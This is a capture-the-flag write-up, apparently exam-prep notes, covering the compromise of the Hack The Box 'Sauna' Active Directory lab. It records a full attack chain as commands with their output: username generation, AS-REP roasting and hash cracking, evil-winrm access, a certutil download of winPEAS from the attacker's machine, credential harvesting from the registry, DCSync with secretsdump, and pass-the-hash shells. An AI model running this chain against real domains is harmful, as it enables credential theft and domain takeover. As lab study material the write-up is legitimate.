HTB Sauna done
Sauna¶
OS:¶
Windows
Technology:¶
Active Directory
IP Address:¶
10.10.10.175
Open ports:¶
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-19 17:06:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
Users and pass:¶
EGOTISTICALBANK\fsmith
Thestrokes23
EGOTISTICALBANK\svc_loanmanager
Moneymakestheworldgoround!
Nmap¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.175_nmap_vulns 10.10.10.175
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 06:04 EDT
Nmap scan report for 10.10.10.175
Host is up (0.041s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.175
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.175:80/
| Form id: email
| Form action: #
|
| Path: http://10.10.10.175:80/contact.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/single.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/single.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/index.html
| Form id: email
| Form action: #
|
| Path: http://10.10.10.175:80/about.html
| Form id: email
|_ Form action: #
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-19 17:06:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Not Found
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time:
| date: 2023-04-19T17:07:31
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 43.03 ms 10.10.14.1
2 43.24 ms 10.10.10.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 451.97 seconds
Add record to /etc/hosts¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# echo "10.10.10.175 egotistical-bank.local" >> /etc/hosts
┌──(root㉿kali)-[~]
Scanning using ffuf¶
ffuf -u http://egotistical-bank.local/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o egotistical-bank.local_ffuz -of all -e .php,.html,.txt,.bac,.backup
Generating usernames using username-anarchy¶
1) Open the website: http://egotistical-bank.local/about.html
2)Create file name with full name of website
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cat full_name_from_website.txt
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
3) Create a username using "username-anarchy"
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ git clone https://github.com/urbanadventurer/username-anarchy.git
Cloning into 'username-anarchy'...
remote: Enumerating objects: 386, done.
remote: Total 386 (delta 0), reused 0 (delta 0), pack-reused 386
Receiving objects: 100% (386/386), 16.76 MiB | 8.79 MiB/s, done.
Resolving deltas: 100% (127/127), done.
Updating files: 100% (112/112), done.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cp -r username-anarchy /tmp
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cd /tmp/username-anarchy
┌──(kali㉿kali)-[/tmp/username-anarchy]
└─$ chmod a+x username-anarchy
┌──(kali㉿kali)-[/tmp/username-anarchy]
└─$ ./username-anarchy --input-file /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/full_name_from_website.txt --select-format first,flast,first.last,firstl > /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/full_name_from_website_aliases.txt
ASREPRoasting Attacks¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ while read as; do python3 /home/kali/.local/bin/GetNPUsers.py egotistical-bank.local/"$as" -request -no-pass -dc-ip 10.10.10.175 >> full_name_hashes.txt; done < full_name_from_website_aliases.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cat full_name_hashes.txt | grep -B2 krb
[*] Getting TGT for fsmith
[email protected]:6ea7a1278aa45a25f95a57270345cfa0$e843b245eb76974feccdaf8c29a9b401886cfbc2ac973bf74abf5136d3e03eec2f77cffec7d36962e3136de4df23b3076c6e602e2f431a8c15f911c402141115421bcc04f34c48fb03e39459dc87b4ccfb34da1f688cc40f13ad24272f1d38e850337184552ec3dd04807dffd2a8bdaf91878198782c29d6f4f7e455f3d4e377b18ef7f84a5a7b875232aaf9326494e525df73fceca79b751fc5b2cb132a1f9e0cf77b92089fc09afd6a11cdee0f423a6da5aec4993607324baaad40a5ad6424dcf52bdafede5bd51ca13db8cef19db3c28b95a238e85d6ac6a53c308a44e90f72340de530318078a4932908074b1b2925d330ad3f65a7c1b037ca2de34e7287
Cracking hash¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ hashcat -m 18200 fsmith_hash.txt /usr/share/wordlists/rockyou.txt --show
[email protected]:6ea7a1278aa45a25f95a57270345cfa0$e843b245eb76974feccdaf8c29a9b401886cfbc2ac973bf74abf5136d3e03eec2f77cffec7d36962e3136de4df23b3076c6e602e2f431a8c15f911c402141115421bcc04f34c48fb03e39459dc87b4ccfb34da1f688cc40f13ad24272f1d38e850337184552ec3dd04807dffd2a8bdaf91878198782c29d6f4f7e455f3d4e377b18ef7f84a5a7b875232aaf9326494e525df73fceca79b751fc5b2cb132a1f9e0cf77b92089fc09afd6a11cdee0f423a6da5aec4993607324baaad40a5ad6424dcf52bdafede5bd51ca13db8cef19db3c28b95a238e85d6ac6a53c308a44e90f72340de530318078a4932908074b1b2925d330ad3f65a7c1b037ca2de34e7287:Thestrokes23
Read flag: user.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/20/2023 11:11 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
5e7d04fc8d0e2c5d7b2b46d3b99143a9
*Evil-WinRM* PS C:\Users\FSmith\Desktop>
Run winPEAS.bat¶
# Share winPEAS.bat - Kali
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
--2023-04-21 07:34:54-- https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35294 (34K) [text/plain]
Saving to: ‘winPEAS.bat’
winPEAS.bat 100%[==============================================>] 34.47K --.-KB/s in 0.03s
2023-04-21 07:34:54 (1.13 MB/s) - ‘winPEAS.bat’ saved [35294/35294]
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ python2 -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
# Download winPEAS.bat - Windows
*Evil-WinRM* PS C:\Users\FSmith\Desktop> certutil -urlcache -split -f http://10.10.14.20:8888/winPEAS.bat winPEAS.bat
**** Online ****
0000 ...
89de
CertUtil: -URLCache command completed successfully.
# Run winPEAS.bat - Windows
C:\Users\FSmith\Desktop>
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cmd.exe /C winPEAS.bat
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
# Check all users - Windows (output winPEAS.bat)
[+] USERS
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
...
# Check groups for user svc_loanmgr
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Users
Global Group memberships *Domain Users
The command completed successfully.
# Look "REMOTE MANAGEMENT USERS"
Run Bloodhound (remote)¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cd sauna_bloodhound_output
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/sauna_bloodhound_output]
└─$ bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S
Check "DCSync" rights¶
DCSync attacks¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ /home/kali/.local/bin/secretsdump.py egotistical-bank/[email protected] -just-dc-user Administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...
Read flag: root.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ /usr/share/doc/python3-impacket/examples/psexec.py egotistical-bank.local/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file rwAVLnGM.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service oMkz on 10.10.10.175.....
[*] Starting service oMkz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> dir C:\Users\Administrator\Desktop\
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM <DIR> .
07/14/2021 03:35 PM <DIR> ..
04/20/2023 11:11 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,695,089,664 bytes free
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
5354b2936328b5c0ed8c29e0b5080d1d
Bonus: read flag¶
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 [email protected]
evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit (on Windows of course)
References:¶
https://github.com/urbanadventurer/username-anarchy